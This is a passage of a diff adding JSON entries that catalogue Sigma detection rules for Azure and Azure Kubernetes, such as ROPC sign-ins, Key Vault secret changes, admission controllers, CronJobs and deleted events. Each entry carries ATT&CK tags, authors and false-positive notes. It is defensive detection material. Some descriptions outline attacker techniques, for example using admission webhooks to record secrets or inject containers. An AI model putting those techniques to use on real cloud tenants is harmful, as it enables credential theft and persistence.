+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/19", + "filename": "azure_app_role_added.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "medium", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", + "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", + "value": "Applications That Are Using ROPC Authentication Flow", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ], + "creation_date": "2022/06/01", + "filename": "azure_app_ropc_authentication.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "medium", + "falsepositive": [ + "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a configuration change is made to an applications 
URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", + "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", + "value": "Application URI Configuration Changes", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ], + "creation_date": "2022/06/02", + "filename": "azure_app_uri_modifications.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "high", + "falsepositive": [ + "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when an account is disabled or blocked for sign in but tried to log in", + "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", + "value": "Account Disabled or Blocked for Sign in Attempts", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2022/06/17", + "filename": "azure_blocked_account_attempt.yml", + "author": "Yochana Henderson, '@Yochana-H'", + "level": "medium", + "falsepositive": [ + "Account disabled or blocked in error", + "Automation account has been blocked or disabled" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", + "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", + "value": "Change to Authentication Method", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2021/10/10", + "filename": "azure_change_to_authentication_method.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", + "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", + "value": "Sign-in Failure Due to 
Conditional Access Requirements Not Met", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2022/06/01", + "filename": "azure_conditional_access_failure.yml", + "author": "Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Service Account misconfigured", + "Misconfigured Systems", + "Vulnerability Scanners" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a Container Registry is created or deleted.", + "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", + "value": "Azure Container Registry Created or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_container_registry_created_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Container Registry being created or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", + "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", + "value": "Number Of Resource Creation Or Deployment Activities", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" + ], + "tags": [ + "attack.t1098" + ], + "creation_date": "2020/05/07", + "filename": "azure_creating_number_of_resources_detection.yml", + "author": "sawwinnnaung", + "level": "medium", + "falsepositive": [ + "Valid change" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a device in azure is no longer managed or compliant", + "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", + "value": "Azure Device No Longer Managed or Compliant", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/03", + "filename": "azure_device_no_longer_managed_or_compliant.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Administrator may have forgotten to review the device." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a device or device configuration in azure is modified or deleted.", + "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", + "value": "Azure Device or Configuration Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/03", + "filename": "azure_device_or_configuration_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Device or device configuration being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when DNS zone is modified or deleted.", + "uuid": "af6925b0-8826-47f1-9324-337507a0babd", + "value": "Azure DNS Zone Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_dns_zone_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when an user or application modified the federation settings on the domain.", + "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", + "value": "Azure Domain Federation Settings Modified", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1078", + "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/09/06", + "filename": "azure_federation_modified.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Federation Settings being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a firewall is created, modified, or deleted.", + "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", + "value": "Azure Firewall Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_firewall_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Firewall being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", + "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", + "value": "Azure Firewall Rule Collection Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", + "value": "Granting Of Permissions To An Account", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" + ], + "tags": [ + "attack.t1098" + ], + "creation_date": "2020/05/07", + "filename": "azure_granting_permission_detection.yml", + "author": "sawwinnnaung", + "level": "medium", + "falsepositive": [ + "Valid change" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", + "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", + "value": "User Added To Group With CA Policy Modification Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/04", + "filename": "azure_group_user_addition_ca_modification.yml", + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "level": "medium", + "falsepositive": [ + "User removed from the group is approved" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on group membership removal of groups that have CA policy 
modification access", + "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", + "value": "User Removed From Group With CA Policy Modification Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/04", + "filename": "azure_group_user_removal_ca_modification.yml", + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "level": "medium", + "falsepositive": [ + "User removed from the group is approved" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", + "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", + "value": "Guest User Invited By Non Approved Inviters", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/10", + "filename": "azure_guest_invite_failure.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "medium", + "falsepositive": [ + "A non malicious user is unaware of the proper process" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", + "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", + "value": "User State Changed From Guest To Member", + "meta": { + 
"refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/06/30", + "filename": "azure_guest_to_member.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", + "uuid": "80eeab92-0979-4152-942d-96749e11df40", + "value": "Azure Keyvault Key Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ], + "creation_date": "2021/08/16", + "filename": "azure_keyvault_key_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Key being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a key vault is modified or deleted.", + "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", + "value": "Azure Key Vault Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ], + "creation_date": "2021/08/16", + "filename": "azure_keyvault_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Key Vault being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when secrets are modified or deleted in Azure.", + "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", + "value": "Azure Keyvault Secrets Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ], + "creation_date": "2021/08/16", + "filename": "azure_keyvault_secrets_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", + "value": "Azure Kubernetes Admission Controller", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ], + "creation_date": "2021/11/25", + "filename": "azure_kubernetes_admission_controller.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Azure Kubernetes Admissions Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", + "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", + "value": "Azure Kubernetes Cluster Created or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_cluster_created_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. 
Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", + "value": "Azure Kubernetes CronJob", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ], + "creation_date": "2021/11/22", + "filename": "azure_kubernetes_cronjob.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Azure Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when Events are deleted in Azure Kubernetes. 
An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", + "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", + "value": "Azure Kubernetes Events Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.t1562.001" + ], + "creation_date": "2021/07/24", + "filename": "azure_kubernetes_events_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", + "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", + "value": "Azure Kubernetes Network Policy Change", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_network_policy_change.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies the deletion of Azure Kubernetes Pods.", + "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", + "value": "Azure Kubernetes Pods Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/07/24", + "filename": "azure_kubernetes_pods_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", + "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", + "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", + "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", + "value": "Azure Kubernetes Sensitive Role Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_role_access.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", + "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", + "value": "Azure Kubernetes Secret or Config Object Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_secret_or_config_object_access.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
